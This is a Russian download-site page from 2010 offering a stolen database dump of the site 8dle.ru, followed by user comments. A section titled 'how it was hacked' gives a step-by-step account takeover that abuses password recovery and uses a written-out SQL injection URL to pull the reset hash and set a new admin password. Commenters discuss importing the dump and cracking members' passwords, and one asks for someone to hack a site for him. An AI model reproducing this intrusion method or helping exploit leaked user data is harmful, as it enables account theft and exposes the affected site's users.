Мы в твиттере Мы в телеграме!

Провеббер » Web » Скрипты » База 8dle.ru

Набор в команду! Ведется набор в команду, для наполнения сайта новым, интересным контентом. Если у тебя есть предложения, свободное время, ты обладаешь интересным контентом, и хочешь поделиться с другими?
Обращайся к нам в ЛС группы Вконтакте.

База 8dle.ru

Данный материал предоставлен сайтом ProWebber.cc исключительно в ознакомительных целях. Администрация не несет ответственности за его содержимое.
Скачать бесплатно База 8dle.ru.



Скачать прямо сейчас:
8dle_2010-05-23_16-42_kkwht.sql.rar [2.12 Mb] (cкачиваний: 295)
MD5: a096ce990077c6d1ff6ec4040bee1484


Как взломали:

[hidden=10,10,200]на 8dle.ru был установлен форум с уязвимостью sql inj
сначала идем на страницу 8dle.ru/?do=lostpassword
В поле вписываем имя админа
Далее в поле PREFIX_lostdb хранится хеш, который отсылается на почту, если открыть правильную ссылку с хешем получается такая же уязвимость как и на 8,2 с востановлением cool
И так мы снегерировали хешь, осталось только достать его из базы
http://8dle.ru/?do=forum&showtopic=23'+union+select+1,2,CONCAT_WS(0x3a, lostname,lostid),4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23+from+8dle_lostdb+where+lostname =ID+limit+1--

указываете ID юзера которого ломаем
смотрим в исходнике полученной страницы *** >> Darknull:md5
Копируем хешь и идем на ссылку
8dle.ru/?do=lostpassword&douser=ID&lostid=md5

вот и перед вами новый админский пароль smile
Если все сделано верно то вы гений biggrin
P.S. 8dle.ru уже залатали востановление пароля
так что ищите свои методы взлома smile[/hidden]


Дополнительные ссылки на скачивание ТОЛЬКО для зарегистрированных


0
Просмотры: 7 676 :: Комментарии (56) :: :: Нужна помощь? Задайте вопрос на форуме ::
Уважаемый посетитель, Вы зашли на сайт как незарегистрированный пользователь.
Мы рекомендуем Вам зарегистрироваться либо войти на сайт под своим именем.

#21Joey

  • 25 мая 2010 18:07
  • Регистрация: 5.01.2010
  • Был(а) онлайн: 31.03.2020
  • Комментариев: 266
  • 0
kzpromo,
biggrin гонка вооружений)
они ддос, а мы базу у них слили:DDDDDDD

#22UnderFire

  • 25 мая 2010 19:51
  • Регистрация: 25.01.2010
  • Был(а) онлайн: 4.06.2011
  • Комментариев: 32
  • 0
Жаль яша сразу убьёт за эту базу =)

#23E-BOYZ

  • 25 мая 2010 19:56
  • Регистрация: 18.02.2010
  • Был(а) онлайн: 5.07.2014
  • Комментариев: 191
  • 0
Админы 8dle щас точно на свой сайт забьют :D

#24kzpromo

  • 25 мая 2010 21:44
  • Регистрация: 11.09.2009
  • Был(а) онлайн: 10.12.2023
  • Комментариев: 90
  • 0
Цитата: tecktonik-super
Админы 8dle щас точно на свой сайт забьют :D

на один ГС станет меньше biggrin

#25pernatik

  • 26 мая 2010 13:25
  • Регистрация: 4.02.2010
  • Был(а) онлайн: 5.05.2014
  • Комментариев: 122
  • 0
Дата: 23 мая 2010

Сообщение с 8дле-шки: "Вниманию админов, наш сайт был хакнут. Для востоновления доступов к вашим аккам, стучите мне... Boroda
Знаю кто хакнул, хакнули еще и мои сайты. Вообщем, стучите будем решать проблему
."

База свеженькая...

Интересно, А будут ли выложены еще базы?

#26ТорЧок

  • 26 мая 2010 13:38
  • Регистрация: 5.01.2010
  • Был(а) онлайн: 5.04.2011
  • Комментариев: 247
  • 0
Цитата: pernatik
База свеженькая...

Спасибо КЭП.

Смотря какой тематики базы интересуют.

--------------------

#27pernatik

  • 26 мая 2010 13:56
  • Регистрация: 4.02.2010
  • Был(а) онлайн: 5.05.2014
  • Комментариев: 122
  • 0
Цитата: pernatik
хакнули еще и мои сайты


Просто если люди хотят насолить админам 8-ки, то я думаю может мы увидим еще базы smile

#28nartuk

  • 26 мая 2010 14:16
  • Регистрация: 7.05.2010
  • Был(а) онлайн: 22.10.2014
  • Комментариев: 220
  • 0
Цитата: pernatik
хакнули еще и мои сайты

Если все было на одном акаунте вирт. хостинга:
ns3.fastvps.ru.
ns4.fastvps.ru.

Если поимели вирт. хостинг, то стянули все smile
Цитата: pernatik
Просто если люди хотят насолить админам 8-ки, то я думаю может мы увидим еще базы

Все не выложат, но кажется мне что еще сюрпризы будут smile

--------------------

#29Hnt

  • 26 мая 2010 15:05
  • Регистрация: 4.03.2010
  • Был(а) онлайн: 25.12.2012
  • Комментариев: 12
  • 0
как базу залить если у нее префикс 8dle как изменить под свой?

#30nartuk

  • 26 мая 2010 15:13
  • Регистрация: 7.05.2010
  • Был(а) онлайн: 22.10.2014
  • Комментариев: 220
  • 0
Hnt,
Есть много вариантов.
Если у тебя дедик, то можешь по ssh поиграться и поправить smile
Можешь через phpMyAdmin переименовывать smile

А можно еще проще biggrin
Идешь
engine/data/dbconfig.php

Ищешь:
define ("PREFIX", "dle");

Меняешь на:
define ("PREFIX", "8dle");

--------------------

#31ТорЧок

  • 26 мая 2010 16:26
  • Регистрация: 5.01.2010
  • Был(а) онлайн: 5.04.2011
  • Комментариев: 247
  • 0
Цитата: nartuk
ns3.fastvps.ru.ns4.fastvps.ru.

Железобетонная логика. dash

Вообще-то эти днс-ы принадлежат fastvps.ru, а не бороде персонально. crazy

--------------------

#32nartuk

  • 26 мая 2010 16:39
  • Регистрация: 7.05.2010
  • Был(а) онлайн: 22.10.2014
  • Комментариев: 220
  • 0
ТорЧок,
Ну да smile
У него походу там акаунт, и если поимели акк - то сперли все что там было biggrin Это логично.
А то что борода владелец FastVPS я не говорил smile

--------------------

#33free_style

  • 26 мая 2010 16:42
  • Регистрация: 27.04.2010
  • Был(а) онлайн: 19.12.2011
  • Комментариев: 35
  • 0
короче ищем нужного вам пользователя 8DLE и бежим расшифровывать пароли)) xD

#34ТорЧок

  • 26 мая 2010 16:45
  • Регистрация: 5.01.2010
  • Был(а) онлайн: 5.04.2011
  • Комментариев: 247
  • 0
nartuk,
wacko Мдооо. "Чем дельше в лес, тем толще партизаны."©

--------------------

#35nartuk

  • 26 мая 2010 17:03
  • Регистрация: 7.05.2010
  • Был(а) онлайн: 22.10.2014
  • Комментариев: 220
  • 0
ТорЧок,
А ты думал biggrin
free_style,
Там уже много поменяли. На сайте же написали меняйте пассворды.
З.Ы. Было бы там что брутить smile

--------------------

#36Light_kun

  • 26 мая 2010 18:15
  • Регистрация: 22.01.2010
  • Был(а) онлайн: 30.10.2014
  • Комментариев: 26
  • 0
Когда видюшка то будет?=) Интересно посмотреть

#37mobiler

  • 26 мая 2010 19:20
  • Регистрация: 7.05.2010
  • Был(а) онлайн: 20.02.2011
  • Комментариев: 75
  • 0
А кто может взломать сайт и забрать базу либо мне, напиши в ЛС

--------------------

#38DaImeR

  • 26 мая 2010 20:14
  • Регистрация: 21.11.2009
  • Был(а) онлайн: 15.01.2015
  • Комментариев: 338
  • 0
, теперь на мыло каждый день приходит по 20-30 писем с говно сайтов diablo diablo diablo

--------------------

#39stellswolf

  • 26 мая 2010 21:02
  • Регистрация: 8.05.2010
  • Был(а) онлайн: 23.02.2012
  • Комментариев: 25
  • 0
отличная база, а префикс легко меняется, можно открыть в Notepad`e и заменить 8дле на дле.

--------------------

#40Joey

  • 26 мая 2010 22:30
  • Регистрация: 5.01.2010
  • Был(а) онлайн: 31.03.2020
  • Комментариев: 266
  • 0
DaImeR,
согласен, бесит это уже
как чью0нибудь базу сольют, так сразу все спамят

Информация
Посетители, находящиеся в группе Гости, не могут оставлять комментарии к данной публикации.

Архив новостей
Ноябрь 2024 (9)
Октябрь 2024 (169)
Сентябрь 2024 (13)
Август 2024 (60)
Июль 2024 (12)
Июнь 2024 (30)

Последние комментарии: